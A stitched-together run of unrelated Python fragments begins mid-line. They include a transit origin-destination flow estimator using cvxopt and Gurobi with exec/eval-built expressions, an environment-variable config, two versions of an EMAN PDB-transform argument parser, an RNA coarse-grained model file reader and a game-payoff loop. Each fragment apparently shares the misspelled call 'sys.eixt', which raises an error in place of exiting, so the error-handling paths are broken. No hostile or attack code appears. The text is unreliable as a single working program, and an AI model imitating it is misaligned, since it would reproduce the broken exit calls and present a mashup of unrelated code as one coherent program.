!= q_origin and i_stop != r_dest: A[2 * N * T + N * t_passby + i_stop, N * N * h_depart + N * q_origin + r_dest] = od_flow_to_stop_prob[q_origin, r_dest, h_depart, i_stop, t_passby] # Measuremnt var (X) coeff # Remember to use t! A[2 * N * T + N * t_passby + i_stop, N * N * T + 2 * N * T + N * t_passby + i_stop] = -1 print() print(' Quadratic programming solver begins ...') # Transform numpy matrix to cvxopt matrix A = matrix(A, tc='d') sol = solvers.qp(Q, p, G, h, A, b) print() print(' Solver finished once!') print(' Slover status:') print(sol['status']) # 'sol' is dictionary # Key: 'status', 'x', 'primal objective' if sol['status'] == 'optimal': print() optimal_objective = sol['primal objective'] # Add constants neglected in optimization. for k_meas in range(I): for i_stop in range(N): optimal_objective += entry_count[N * k_meas + i_stop]**2 optimal_objective += exit_count[N * k_meas + i_stop]**2 optimal_objective += passby_count[N * k_meas + i_stop]**2 print("Optimal objective " + str(optimal_objective)) for q_origin in range(N): for r_dest in range(N): for h_depart in range(T): od_flow[q_origin, r_dest, h_depart] = sol['x'][N * N * h_depart + N * q_origin + r_dest] else: print() print(' Error: no optimal solution found!') # Stop iteration sys.eixt(1) # Sparse matrix elif QUADRATIC_PROG_SOLVING_PKG == "gurobi": # If the platform is Win, objective and constraints should be added. if platform.system() == 'Windows': m = Model("qp") # Create variables # f_i_j_h for q_origin in range(N): for r_dest in range(N): for h_depart in range(T): if INTEGER_PROG == 1: exec( "f_%d_%d_%d = m.addVar(vtype=GRB.INTEGER, lb=0, name='f_%d_%d_%d')" % (q_origin, r_dest, h_depart, q_origin, r_dest, h_depart), globals()) elif INTEGER_PROG == 0: exec( "f_%d_%d_%d = m.addVar(vtype=GRB.CONTINUOUS, lb=0, name='f_%d_%d_%d')" % (q_origin, r_dest, h_depart, q_origin, r_dest, h_depart), globals()) # o_q_h for q_origin in range(N): for h_depart in range(T): exec( "o_%d_%d = m.addVar(vtype=GRB.CONTINUOUS, lb=0, name='o_%d_%d')" % (q_origin, h_depart, q_origin, h_depart), globals()) # d_r_t for r_dest in range(N): for t in range(T): exec( "d_%d_%d = m.addVar(vtype=GRB.CONTINUOUS, lb=0, name='d_%d_%d')" % (r_dest, t, r_dest, t), globals()) # x_i_t for i_stop in range(N): for t in range(T): exec( "x_%d_%d = m.addVar(vtype=GRB.CONTINUOUS, lb=0, name='x_%d_%d')" % (i_stop, t, i_stop, t), globals()) # Set objective obj_str = 'obj = ' for k_meas in range(I): # o_q_h for q_origin in range(N): temp_str = '(' for h_depart in range(C * k_meas, C * (k_meas + 1)): temp_str += 'o_' + str(q_origin) + '_' + str( h_depart) if h_depart != C * (k_meas + 1) - 1: temp_str += '+' temp_str += ' - ' + str( entry_count[N * k_meas + q_origin]) temp_str += ')' obj_str += temp_str + '*' + temp_str obj_str += ' + ' # d_r_t for r_dest in range(N): temp_str = '(' for t in range(C * k_meas, C * (k_meas + 1)): temp_str += 'd_' + str(r_dest) + '_' + str(t) if t != C * (k_meas + 1) - 1: temp_str += '+' temp_str += ' - ' + str( exit_count[N * k_meas + r_dest]) temp_str += ')' obj_str += temp_str + '*' + temp_str obj_str += ' + ' # x_i_t for i_stop in range(N): temp_str = '(' for t in range(C * k_meas, C * (k_meas + 1)): temp_str += 'x_' + str(i_stop) + '_' + str(t) if t != C * (k_meas + 1) - 1: temp_str += '+' temp_str += ' - ' + str( passby_count[N * k_meas + i_stop]) temp_str += ')' obj_str += temp_str + '*' + temp_str if not (i_stop == (N - 1) and k_meas == (I - 1)): obj_str += ' + ' if TEST_QUADRATIC_PROG == 1: print() print(" objective is:") print(obj_str) # End of test print. exec(obj_str, globals()) m.setObjective(obj, GRB.MINIMIZE) # Add constraints (part). count_constraint = 0 # o_q_h for q_origin in range(N): for h_depart in range(T): const_str = '' temp_count = 0 for r_dest in range(N): if r_dest != q_origin: if temp_count != 0: const_str += ' + ' const_str += 'f_' + str(q_origin) + '_' + str( r_dest) + '_' + str(h_depart) temp_count += 1 if temp_count > 0: const_str += ' == ' const_str += 'o_' + str(q_origin) + '_' + str( h_depart) if TEST_QUADRATIC_PROG == 1: print() print( " A entry count constraint is added: ") print(const_str) # End of test print. m.addConstr(eval(const_str), 'c' + str(count_constraint)) count_constraint += 1 # If the sys is not Win, delete dated constraints. if platform.system() != 'Windows' and iteration_count != 0: m.remove(m.getConstrs()[N * T:3 * N * T]) # Add other constraints in the following. count_constraint = N * T # d_r_t for r_dest in range(N): for t in range(1, T): const_str = '' temp_count = 0 for q_origin in range(N): for h_depart in range(T): if q_origin != r_dest and h_depart < t: if od_flow_to_stop_prob[q_origin, r_dest, h_depart, r_dest, t] > 0.0001: if temp_count != 0: const_str += ' + ' const_str += str( od_flow_to_stop_prob[q_origin, r_dest, h_depart, r_dest, t] ) + ' * f_' + str(q_origin) + '_' + str( r_dest) + '_' + str(h_depart) temp_count += 1 if temp_count > 0: const_str += ' == ' const_str += 'd_' + str(r_dest) + '_' + str(t) if TEST_QUADRATIC_PROG == 1: print() print(" A exit count constraint is added: ") print(const_str) # End of test print. m.addConstr(eval(const_str), 'c' + str(count_constraint)) count_constraint += 1 # x_i_t for i_stop in range(N): for t in range(T): const_str = '' temp_count = 0 for q_origin in range(N): for r_dest in range(N): for h_depart in range(T): if i_stop != q_origin and i_stop != r_dest and t > h_depart and od_flow_to_stop_prob[ q_origin, r_dest, h_depart, i_stop, t] > 0.0001: if temp_count != 0: const_str += ' + ' const_str += str( od_flow_to_stop_prob[q_origin, r_dest, h_depart, i_stop, t] ) + ' * f_' + str(q_origin) + '_' + str( r_dest) + '_' + str(h_depart) temp_count += 1 if temp_count > 0: const_str += ' == ' const_str += 'x_' + str(i_stop) + '_' + str(t) if TEST_QUADRATIC_PROG == 1: print() print(" A passby count constraint is added: ") print(const_str) # End of test print. m.addConstr(eval(const_str), 'c' + str(count_constraint)) count_constraint += 1 # Optimize model m.optimize() print(' Obj: %g' % m.objVal) if iteration_count == 0: with open("results/dynamic/obj_upper_level.csv", "w") as f: f.write(str(m.objVal)) else: with open("results/dynamic/obj_upper_level.csv", "a") as f: f.write('\n') f.write(str(m.objVal)) # Obtain results for v in m.getVars(): temp_name = v.varName temp_name = temp_name.split('_') if temp_name[0] == 'f': od_flow[int(temp_name[1]), int(temp_name[2]), int(temp_name[3])] = v.x # Save results np.save( 'results/dynamic/od_flow_upper_level_iteration_' + str(iteration_count), od_flow) print() print(' The optimal od_flow obtained!') # Lower level - Solving dynamic schedule based UE assignment problem. print(' Lower level begins ...') # If this is not a test, then update od_flow_to_stop_prob. if (TEST_QUADRATIC_PROG != 1): od_flow_to_stop_prob, link_combined_flow = dynamic_schedule_based_ue_assignment_algorithm( tn, od_flow, od_flow_to_stop_prob) #np.save('results/dynamic/od_flow_to_stop_prob_upper_level_iteration_' + str(iteration_count), od_flow_to_stop_prob) np.save( 'results/dynamic/link_combined_flow_upper_level_iteration_' + str(iteration_count), link_combined_flow) else: print() print( " Testing quadratic prog; od_flow_to_stop_prob is not updated." ) # Convergence test. if iteration_count >= 1: avg_mse_od_flow = 0 for r in range(N): for s in range(N): for h_depart in range(T): avg_mse_od_flow += (od_flow_last[r, s, h_depart] - od_flow[r, s, h_depart])**2 #if abs(od_flow_last[r,s,h_depart] - od_flow[r,s,h_depart]) > 0.1: # print() # print(" od_flow_last" + str([r,s,h_depart]) + ": " + str(od_flow_last[r,s,h_depart])) # print(" od_flow" + str([r,s,h_depart]) + ": " + str(od_flow[r,s,h_depart])) avg_mse_od_flow /= N * N * T print() print(" Iteration: " + str(iteration_count) + " avg_mse_od_flow: " + str(avg_mse_od_flow)) if iteration_count == 1: with open("results/dynamic/avg_mse_od_flow_upper_level.csv", 'w') as f: f.write(str(avg_mse_od_flow)) else: with open("results/dynamic/avg_mse_od_flow_upper_level.csv", 'a') as f: f.write('\n') f.write(str(avg_mse_od_flow)) avg_mse_link_flow = 0 for link_index in range(len(link_combined_flow)): avg_mse_link_flow += (link_combined_flow_last[link_index] - link_combined_flow[link_index])**2 #if abs(link_combined_flow_last[link_index] - link_combined_flow[link_index]) > 0.1: # print() # print(" link_combined_flow_last" + str([link_index]) + ": " + str(link_combined_flow_last[link_index])) # print(" link_combined_flow" + str([link_index]) + ": " + str(link_combined_flow[link_index])) avg_mse_link_flow /= len(link_combined_flow) print() print(" Iteration: " + str(iteration_count) + " avg_mse_link_flow: " + str(avg_mse_link_flow)) if iteration_count == 1: with open("results/dynamic/avg_mse_link_flow_upper_level.csv", 'w') as f: f.write(str(avg_mse_link_flow)) else: with open("results/dynamic/avg_mse_link_flow_upper_level.csv", 'a') as f: f.write('\n') f.write(str(avg_mse_link_flow)) if avg_mse_od_flow < CONVERGENCE_CRITERION and avg_mse_link_flow < CONVERGENCE_CRITERION: print() print("Convergence reached!") converg_flag = 1 continue od_flow_last = deepcopy(od_flow) link_combined_flow_last = deepcopy(link_combined_flow) if iteration_count >= MAX_NUMBER_OF_ITERATIONS: print() print(' Warning! bi-level prog not converging at ' + str(MAX_NUMBER_OF_ITERATIONS) + 'th iteration!') sys.exit(1) iteration_count += 1 return od_flow
""" set environment variables. """ import os import sys # root path for job_surveillance dir PATH = None # user name USER = None # user email address USER_EMAIL = None # fake email address from which sending email # to users. SERVER_EMAIL = None # initial environment var PATH = os.environ['JOB_SVLN_PATH'].rstrip('/') + '/' PATH = os.path.expanduser(PATH) if not os.path.isdir(PATH): print "Terminated: JOB_SVLN_PATH is not valid!\n" sys.eixt() USER = os.environ['JOB_SVLN_USER'] USER_EMAIL = os.environ['JOB_SVLN_USER_EMAIL'] SERVER_EMAIL = os.environ['JOB_SVLN_SERVER_EMAIL']
def main(): progname = os.path.basename(sys.argv[0]) usage = """Usage:\nprocpdb.py <input>\nprocpdb.py <input> <output> [rot=<alt,az,phi>] [trans=<dx,dy,dz>] [centeratoms] [centerelec] [centermass] [apix=<A/pixel>]\n.""" parser = EMArgumentParser(usage=usage, version=EMANVERSION) #################### parser.add_argument( "--animorph", "-AN", type=str, help= "This will use a morph vector file (segment3d) to morph atom positions,#P [animorph=<n>,<apix>,<vecfile>]", default=None) parser.add_argument("--apix", "-A", type=float, help="apix", default=1.0) parser.add_argument("--scale", "-S", type=float, help="scale", default=1.0) parser.add_argument("--center", "-C", type=str, help="center of the rotation, (0,0,0)", default='0.0,0.0,0.0') parser.add_argument( "--chains", type=str, help="String list of chain identifiers to include, eg 'ABEFG'", default=None) parser.add_argument("--trans", "-TR", type=str, help="transform, (0,0,0)", default='0,0,0') parser.add_argument("--include", type=str, help="savetype", default=["helix", "sheet", "other"]) parser.add_argument("--mirror", type=bool, help="mirror", default='False') #matrix parser.add_argument("--matrix", "-matrix", type=str, help="transform matrix.", default='0,0,0,0,0,0,0,0,0,0,0,0') parser.add_argument( "--rot", type=str, metavar="az,alt,phi or convention:par=val:...", help= "Rotate map. Specify az,alt,phi or convention:par=val:par=val:... eg - mrc:psi=22:theta=15:omega=7", action="append", default=None) parser.add_argument("--type", "-T", type=str, help="convention type", default='eman') #eman input, default setting parser.add_argument("--az", "-az", type=float, help="az in eman convention.", default=0) parser.add_argument("--alt", "-alt", type=float, help="alt in eman convention.", default=0) parser.add_argument("--phi", "-phi", type=float, help="phi.", default=0) #imagic parser.add_argument("--alpha", "-alpha", type=float, help="alpha in imagic convention.", default=0) parser.add_argument("--beta", "-beta", type=float, help="beta in imagic convention.", default=0) parser.add_argument("--gamma", "-gamma", type=float, help="gamma in imagic convention.", default=0) #spider parser.add_argument("--theta", "-theta", type=float, help="theta.", default=0) parser.add_argument("--psi", "-psi", type=float, help="psi in spider convention.", default=0) #xyz parser.add_argument("--xtilt", "-xtilt", type=float, help="xtilt in xyz convention.", default=0) parser.add_argument("--ytilt", "-ytilt", type=float, help="ytilt in xyz convention.", default=0) parser.add_argument("--ztilt", "-ztilt", type=float, help="ztilt in xyz convention.", default=0) #mrc parser.add_argument("--omega", "-omega", type=float, help="omega.", default=0) #quaternion parser.add_argument("--e0", "-e0", type=float, help="e0 in quaternion convention.", default=0) parser.add_argument("--e1", "-e1", type=float, help="e1 in quaternion convention.", default=0) parser.add_argument("--e2", "-e2", type=float, help="e2 in quaternion convention.", default=0) parser.add_argument("--e3", "-e3", type=float, help="e3 in quaternion convention.", default=0) #spin parser.add_argument("--n1", "-n1", type=float, help="n1.", default=0) parser.add_argument("--n2", "-n2", type=float, help="n2.", default=0) parser.add_argument("--n3", "-n3", type=float, help="n3.", default=0) #sigrot parser.add_argument("--q", "-q", type=float, help="q in sgirot convention.", default=0) (options, args) = parser.parse_args() if len(args) < 2: parser.error("Input and output files required") sys.eixt(1) trans = options.trans mirror = options.mirror mat = options.matrix.split(',') try: mat = [float(i) for i in mat] except: raise Exception("Invalid Input: %s" % optstr) trans = options.trans.split(',') try: trans = [float(i) for i in trans] except: raise Exception("Invalid Input: %s" % optstr) parms = {"type": options.type} parms["tx"] = trans[0] parms["ty"] = trans[1] parms["tz"] = trans[2] parms["scale"] = options.scale parms["mirror"] = options.mirror if options.rot == None: if options.type == "matrix": t = Transform(mat) elif options.type == "eman": parms["az"] = options.az parms["alt"] = options.alt parms["phi"] = options.phi try: t = Transform(parms) except: raise Exception("Invalid transform: %s" % parms) elif options.type == "imagic": parms["alpha"] = options.alpha parms["beta"] = options.beta parms["gamma"] = options.gamma try: t = Transform(parms) except: raise Exception("Invalid transform: %s" % parms) elif options.type == "spider": parms["phi"] = options.phi parms["theta"] = options.theta parms["psi"] = options.psi try: t = Transform(parms) except: raise Exception("Invalid transform: %s" % parms) elif options.type == "xyz": parms["xtilt"] = options.xtilt parms["ytilt"] = options.ytilt parms["ztilt"] = options.ztilt try: t = Transform(parms) except: raise Exception("Invalid transform: %s" % parms) elif options.type == "mrc": parms["phi"] = options.phi parms["theta"] = options.theta parms["omega"] = options.omega try: t = Transform(parms) except: raise Exception("Invalid transform: %s" % parms) elif options.type == "quaternion": parms["e0"] = options.e0 parms["e1"] = options.e1 parms["e2"] = options.e2 parms["e3"] = options.e3 try: t = Transform(parms) except: raise Exception("Invalid transform: %s" % parms) elif options.type == "spin": parms["omega"] = options.omega parms["n1"] = options.n1 parms["n2"] = options.n2 parms["n3"] = options.n3 try: t = Transform(parms) except: raise Exception("Invalid transform: %s" % parms) elif options.type == "sgirot": parms["n1"] = options.n1 parms["n2"] = options.n2 parms["n3"] = options.n3 parms["q"] = options.q try: t = Transform(parms) except: raise Exception("Invalid transform: %s" % parms) else: print( "get error, please input the right convention, example eman, imagic, spider, mrc, xyz, sgirot, quaternion, matrix" ) else: t = parse_transform(options.rot[0]) inp = open(args[0], 'r') lines = inp.readlines() inp.close() outputlines = pdb_transform(t, lines, options.center, options.include, options.animorph, options.apix, options.chains, trans) out = open(args[1], "w") for i in outputlines: out.write(i) out.close()
def main(): progname = os.path.basename(sys.argv[0]) usage = """Usage:\nprocpdb.py <input>\nprocpdb.py <input> <output> [rot=<alt,az,phi>] [trans=<dx,dy,dz>] [centeratoms] [centerelec] [centermass] [apix=<A/pixel>]\n.""" parser = EMArgumentParser(usage=usage,version=EMANVERSION) #################### parser.add_argument("--animorph", "-AN", type=str, help="This will use a morph vector file (segment3d) to morph atom positions,#P [animorph=<n>,<apix>,<vecfile>]",default=None) parser.add_argument("--apix", "-A", type=float, help="apix", default=1.0) parser.add_argument("--scale", "-S", type=float, help="scale", default=1.0) parser.add_argument("--center", "-C", type=str, help="center of the rotation, (0,0,0)", default='0.0,0.0,0.0') parser.add_argument("--chains",type=str,help="String list of chain identifiers to include, eg 'ABEFG'", default=None) parser.add_argument("--trans", "-TR", type=str, help="transform, (0,0,0)",default='0,0,0') parser.add_argument("--include", type=str,help="savetype", default=["helix","sheet","other"]) parser.add_argument("--mirror",type=bool, help="mirror",default='False') parser.add_argument("--type", "-T", type=str, help="convention type", default='eman') #eman input, default setting parser.add_argument("--az", "-az", type=float, help="az in eman convention.", default=0) parser.add_argument("--alt", "-alt", type=float, help="alt in eman convention.", default=0) parser.add_argument("--phi", "-phi", type=float, help="phi.", default=0) #imagic parser.add_argument("--alpha", "-alpha", type=float, help="alpha in imagic convention.", default=0) parser.add_argument("--beta", "-beta", type=float, help="beta in imagic convention.", default=0) parser.add_argument("--gamma", "-gamma", type=float, help="gamma in imagic convention.", default=0) #spider parser.add_argument("--theta", "-theta", type=float, help="theta.", default=0) parser.add_argument("--psi", "-psi", type=float, help="psi in spider convention.", default=0) #xyz parser.add_argument("--xtilt", "-xtilt", type=float, help="xtilt in xyz convention.", default=0) parser.add_argument("--ytilt", "-ytilt", type=float, help="ytilt in xyz convention.", default=0) parser.add_argument("--ztilt", "-ztilt", type=float, help="ztilt in xyz convention.", default=0) #mrc parser.add_argument("--omega", "-omega", type=float, help="omega.", default=0) #quaternion parser.add_argument("--e0", "-e0", type=float, help="e0 in quaternion convention.", default=0) parser.add_argument("--e1", "-e1", type=float, help="e1 in quaternion convention.", default=0) parser.add_argument("--e2", "-e2", type=float, help="e2 in quaternion convention.", default=0) parser.add_argument("--e3", "-e3", type=float, help="e3 in quaternion convention.", default=0) #spin parser.add_argument("--n1", "-n1", type=float, help="n1.", default=0) parser.add_argument("--n2", "-n2", type=float, help="n2.", default=0) parser.add_argument("--n3", "-n3", type=float, help="n3.", default=0) #sigrot parser.add_argument("--q", "-q", type=float, help="q in sgirot convention.", default=0) #matrix parser.add_argument("--matrix", "-matrix", type=str, help="transform matrix.", default='0,0,0,0,0,0,0,0,0,0,0,0') parser.add_argument("--rot",type=str,metavar="az,alt,phi or convention:par=val:...",help="Rotate map. Specify az,alt,phi or convention:par=val:par=val:... eg - mrc:psi=22:theta=15:omega=7", action="append",default=None) (options, args) = parser.parse_args() if len(args)<2 : parser.error("Input and output files required") sys.eixt(1) trans=options.trans mirror=options.mirror mat=options.matrix.split(',') try: mat=[float(i) for i in mat] except: raise Exception,"Invalid Input: %s"%optstr trans=options.trans.split(',') try: trans=[float(i) for i in trans] except: raise Exception,"Invalid Input: %s"%optstr parms={"type":options.type} parms["tx"]=trans[0] parms["ty"]=trans[1] parms["tz"]=trans[2] parms["scale"]=options.scale parms["mirror"]=options.mirror if options.rot==None: if options.type=="matrix": t=Transform(mat) elif options.type=="eman": parms["az"]=options.az parms["alt"]=options.alt parms["phi"]=options.phi try: t=Transform(parms) except: raise Exception,"Invalid transform: %s"%parms elif options.type=="imagic": parms["alpha"]=options.alpha parms["beta"]=options.beta parms["gamma"]=options.gamma try: t=Transform(parms) except: raise Exception,"Invalid transform: %s"%parms elif options.type=="spider": parms["phi"]=options.phi parms["theta"]=options.theta parms["psi"]=options.psi try: t=Transform(parms) except: raise Exception,"Invalid transform: %s"%parms elif options.type=="xyz": parms["xtilt"]=options.xtilt parms["ytilt"]=options.ytilt parms["ztilt"]=options.ztilt try: t=Transform(parms) except: raise Exception,"Invalid transform: %s"%parms elif options.type=="mrc": parms["phi"]=options.phi parms["theta"]=options.theta parms["omega"]=options.omega try: t=Transform(parms) except: raise Exception,"Invalid transform: %s"%parms elif options.type=="quaternion": parms["e0"]=options.e0 parms["e1"]=options.e1 parms["e2"]=options.e2 parms["e3"]=options.e3 try: t=Transform(parms) except: raise Exception,"Invalid transform: %s"%parms elif options.type=="spin": parms["omega"]=options.omega parms["n1"]=options.n1 parms["n2"]=options.n2 parms["n3"]=options.n3 try: t=Transform(parms) except: raise Exception,"Invalid transform: %s"%parms elif options.type=="sgirot": parms["n1"]=options.n1 parms["n2"]=options.n2 parms["n3"]=options.n3 parms["q"]=options.q try: t=Transform(parms) except: raise Exception,"Invalid transform: %s"%parms else: print "get error, please input the right convention, example eman, imagic, spider, mrc, xyz, sgirot, quaternion, matrix" else: t=parse_transform(options.rot[0]) inp = open(args[0], 'r') lines = inp.readlines() inp.close() outputlines=pdb_transform(t,lines,options.center,options.include,options.animorph,options.apix,options.chains,trans) out=open(args[1],"w") for i in outputlines: out.write(i) out.close()
def read_all(self, ni): self._file.seek(0) for line in self._file: if line[0:4] == 'bond': ni.bondlengths.append(line2bondlength(line)) elif line[0:4] == 'fene': ni.fenes.append(line2fene(line)) elif line[0:4] == 'angl': ni.bondangles.append(line2bondangle(line)) elif line[0:4] == 'dihd': ni.dihedrals.append(line2dihedral(line)) elif line[0:7] == 'contact': ni.contacts.append(line2contact(line)) elif line[0:2] == 'LJ': ni.contacts.append(line2LJ(line)) elif line[0:9] == 'basestack': ni.basestacks.append(line2basestack(line)) elif line[0:8] == 'basepair': ni.basepairs.append(line2basepair(line)) ''' bs-dist (BaseStackDT) ''' self._file.seek(0) for line in self._file: if line[0:7] == 'bs-dist': ni.basestackDTs.append(line2basestackDT(line)) self._file.seek(0) for line in self._file: if line[0:7] == 'bs-dihd': lsp = line.split() itr = iter(lsp) next(itr) # 'bs-dihd' ibs = int(next(itr)) for bs in ni.basestackDTs: if bs.id == ibs: if bs.dih1_id is None: bs.dih1_id = int(next(itr)) bs.dih1_iunit1 = int(next(itr)) bs.dih1_iunit2 = int(next(itr)) bs.dih1_imp1 = int(next(itr)) bs.dih1_imp2 = int(next(itr)) bs.dih1_imp3 = int(next(itr)) bs.dih1_imp4 = int(next(itr)) bs.dih1_imp1un = int(next(itr)) bs.dih1_imp2un = int(next(itr)) bs.dih1_imp3un = int(next(itr)) bs.dih1_imp4un = int(next(itr)) bs.dih1_native = float(next(itr)) bs.dih1_coef = float(next(itr)) bs.dih1_type = next(itr) elif bs.dih2_id is None: bs.dih2_id = int(next(itr)) bs.dih2_iunit1 = int(next(itr)) bs.dih2_iunit2 = int(next(itr)) bs.dih2_imp1 = int(next(itr)) bs.dih2_imp2 = int(next(itr)) bs.dih2_imp3 = int(next(itr)) bs.dih2_imp4 = int(next(itr)) bs.dih2_imp1un = int(next(itr)) bs.dih2_imp2un = int(next(itr)) bs.dih2_imp3un = int(next(itr)) bs.dih2_imp4un = int(next(itr)) bs.dih2_native = float(next(itr)) bs.dih2_coef = float(next(itr)) bs.dih2_type = next(itr) else: print('Error dih1 and dih2 are occupied') sys.exit(2) #check for bs in ni.basestackDTs: if bs.dih1_id is None or bs.dih2_id is None: print('Error dih1 and/or dih2 is empty') sys.eixt(2) ''' tbs-dist (TertiaryStackDT) ''' self._file.seek(0) for line in self._file: if line[0:8] == 'tbs-dist': ni.tertiarystackDTs.append(line2tertiarystackDT(line)) self._file.seek(0) for line in self._file: if line[0:8] == 'tbs-angl': lsp = line.split() itr = iter(lsp) next(itr) # 'tbs-angl' ibs = int(next(itr)) for bs in ni.tertiarystackDTs: if bs.id == ibs: if bs.ang1_id is None: bs.ang1_id = int(next(itr)) bs.ang1_iunit1 = int(next(itr)) bs.ang1_iunit2 = int(next(itr)) bs.ang1_imp1 = int(next(itr)) bs.ang1_imp2 = int(next(itr)) bs.ang1_imp3 = int(next(itr)) bs.ang1_imp1un = int(next(itr)) bs.ang1_imp2un = int(next(itr)) bs.ang1_imp3un = int(next(itr)) bs.ang1_native = float(next(itr)) bs.ang1_coef = float(next(itr)) elif bs.ang2_id is None: bs.ang2_id = int(next(itr)) bs.ang2_iunit1 = int(next(itr)) bs.ang2_iunit2 = int(next(itr)) bs.ang2_imp1 = int(next(itr)) bs.ang2_imp2 = int(next(itr)) bs.ang2_imp3 = int(next(itr)) bs.ang2_imp1un = int(next(itr)) bs.ang2_imp2un = int(next(itr)) bs.ang2_imp3un = int(next(itr)) bs.ang2_native = float(next(itr)) bs.ang2_coef = float(next(itr)) else: print('Error ang1 and ang2 are occupied') sys.exit(2) self._file.seek(0) for line in self._file: if line[0:8] == 'tbs-dihd': lsp = line.split() itr = iter(lsp) next(itr) # 'tbs-dihd' ibs = int(next(itr)) for bs in ni.tertiarystackDTs: if bs.id == ibs: if bs.dih0_id is None: bs.dih0_id = int(next(itr)) bs.dih0_iunit1 = int(next(itr)) bs.dih0_iunit2 = int(next(itr)) bs.dih0_imp1 = int(next(itr)) bs.dih0_imp2 = int(next(itr)) bs.dih0_imp3 = int(next(itr)) bs.dih0_imp4 = int(next(itr)) bs.dih0_imp1un = int(next(itr)) bs.dih0_imp2un = int(next(itr)) bs.dih0_imp3un = int(next(itr)) bs.dih0_imp4un = int(next(itr)) bs.dih0_native = float(next(itr)) bs.dih0_coef = float(next(itr)) elif bs.dih1_id is None: bs.dih1_id = int(next(itr)) bs.dih1_iunit1 = int(next(itr)) bs.dih1_iunit2 = int(next(itr)) bs.dih1_imp1 = int(next(itr)) bs.dih1_imp2 = int(next(itr)) bs.dih1_imp3 = int(next(itr)) bs.dih1_imp4 = int(next(itr)) bs.dih1_imp1un = int(next(itr)) bs.dih1_imp2un = int(next(itr)) bs.dih1_imp3un = int(next(itr)) bs.dih1_imp4un = int(next(itr)) bs.dih1_native = float(next(itr)) bs.dih1_coef = float(next(itr)) elif bs.dih2_id is None: bs.dih2_id = int(next(itr)) bs.dih2_iunit1 = int(next(itr)) bs.dih2_iunit2 = int(next(itr)) bs.dih2_imp1 = int(next(itr)) bs.dih2_imp2 = int(next(itr)) bs.dih2_imp3 = int(next(itr)) bs.dih2_imp4 = int(next(itr)) bs.dih2_imp1un = int(next(itr)) bs.dih2_imp2un = int(next(itr)) bs.dih2_imp3un = int(next(itr)) bs.dih2_imp4un = int(next(itr)) bs.dih2_native = float(next(itr)) bs.dih2_coef = float(next(itr)) else: print('Error dih1 and dih2 are occupied') sys.exit(2) #check for bs in ni.tertiarystackDTs: if bs.ang1_id is None or bs.ang2_id is None or bs.dih0_id is None or bs.dih1_id is None or bs.dih2_id is None: print( 'Error ang1 and/or ang2 and/or dih1 and/or dih2 is empty') sys.eixt(2) ''' hb-dist (HBondDT) ''' self._file.seek(0) for line in self._file: if line[0:7] == 'hb-dist': ni.hbondDTs.append(line2hbondDT(line)) self._file.seek(0) for line in self._file: if line[0:7] == 'hb-angl': lsp = line.split() itr = iter(lsp) next(itr) # 'hb-angl' ihb = int(next(itr)) for hb in ni.hbondDTs: if hb.id == ihb: if hb.ang1_id is None: hb.ang1_id = int(next(itr)) hb.ang1_iunit1 = int(next(itr)) hb.ang1_iunit2 = int(next(itr)) hb.ang1_imp1 = int(next(itr)) hb.ang1_imp2 = int(next(itr)) hb.ang1_imp3 = int(next(itr)) hb.ang1_imp1un = int(next(itr)) hb.ang1_imp2un = int(next(itr)) hb.ang1_imp3un = int(next(itr)) hb.ang1_native = float(next(itr)) hb.ang1_coef = float(next(itr)) elif hb.ang2_id is None: hb.ang2_id = int(next(itr)) hb.ang2_iunit1 = int(next(itr)) hb.ang2_iunit2 = int(next(itr)) hb.ang2_imp1 = int(next(itr)) hb.ang2_imp2 = int(next(itr)) hb.ang2_imp3 = int(next(itr)) hb.ang2_imp1un = int(next(itr)) hb.ang2_imp2un = int(next(itr)) hb.ang2_imp3un = int(next(itr)) hb.ang2_native = float(next(itr)) hb.ang2_coef = float(next(itr)) else: print('Error ang1 and ang2 are occupied') sys.exit(2) self._file.seek(0) for line in self._file: if line[0:7] == 'hb-dihd': lsp = line.split() itr = iter(lsp) next(itr) # 'hb-dihd' ihb = int(next(itr)) for hb in ni.hbondDTs: if hb.id == ihb: if hb.dih0_id is None: hb.dih0_id = int(next(itr)) hb.dih0_iunit1 = int(next(itr)) hb.dih0_iunit2 = int(next(itr)) hb.dih0_imp1 = int(next(itr)) hb.dih0_imp2 = int(next(itr)) hb.dih0_imp3 = int(next(itr)) hb.dih0_imp4 = int(next(itr)) hb.dih0_imp1un = int(next(itr)) hb.dih0_imp2un = int(next(itr)) hb.dih0_imp3un = int(next(itr)) hb.dih0_imp4un = int(next(itr)) hb.dih0_native = float(next(itr)) hb.dih0_coef = float(next(itr)) elif hb.dih1_id is None: hb.dih1_id = int(next(itr)) hb.dih1_iunit1 = int(next(itr)) hb.dih1_iunit2 = int(next(itr)) hb.dih1_imp1 = int(next(itr)) hb.dih1_imp2 = int(next(itr)) hb.dih1_imp3 = int(next(itr)) hb.dih1_imp4 = int(next(itr)) hb.dih1_imp1un = int(next(itr)) hb.dih1_imp2un = int(next(itr)) hb.dih1_imp3un = int(next(itr)) hb.dih1_imp4un = int(next(itr)) hb.dih1_native = float(next(itr)) hb.dih1_coef = float(next(itr)) elif hb.dih2_id is None: hb.dih2_id = int(next(itr)) hb.dih2_iunit1 = int(next(itr)) hb.dih2_iunit2 = int(next(itr)) hb.dih2_imp1 = int(next(itr)) hb.dih2_imp2 = int(next(itr)) hb.dih2_imp3 = int(next(itr)) hb.dih2_imp4 = int(next(itr)) hb.dih2_imp1un = int(next(itr)) hb.dih2_imp2un = int(next(itr)) hb.dih2_imp3un = int(next(itr)) hb.dih2_imp4un = int(next(itr)) hb.dih2_native = float(next(itr)) hb.dih2_coef = float(next(itr)) else: print('Error dih0 and dih1 and dih2 are occupied') sys.exit(2) #check for hb in ni.hbondDTs: if hb.ang1_id is None or hb.ang2_id is None or hb.dih0_id is None or hb.dih1_id is None or hb.dih2_id is None: print( 'Error ang1 and/or ang2 and/or dih0 and/or dih1 and/or dih2 is empty' ) sys.eixt(2)
payoff_old = -10**8 angle_decrease_iterations = 0 vgs_l = [] for i in range(iterations): payoff = s.dot(vertex_payoff) vertex_gain = np.where((vertex_payoff - payoff) > 0, vertex_payoff - payoff, 0) # important: vg must be decreasing all the time vg = vertex_gain.sum() if vg > vg_old: print(i, 'vg increases, and that is wrong!') sys.exit(1) # and meanwhile payoff should be increasing all the time if payoff < payoff_old: print(i, 'payoff decreases, and that is wrong!') sys.eixt(1) # print(payoff) # print(s.tolist(), vertex_gain.tolist()) # print(vertex_gain.round(2)) angle = utils.vector_angle(s, vertex_gain) # print(angle_old, angle) if angle > angle_old and i > 0: angle_decrease_iterations += 1 ''' if i > iterations - 1000: print(i, angle - angle_old) ''' payoff_old = payoff angle_old = angle vg_old = vertex_gain.sum() vgs_l.append(vg_old)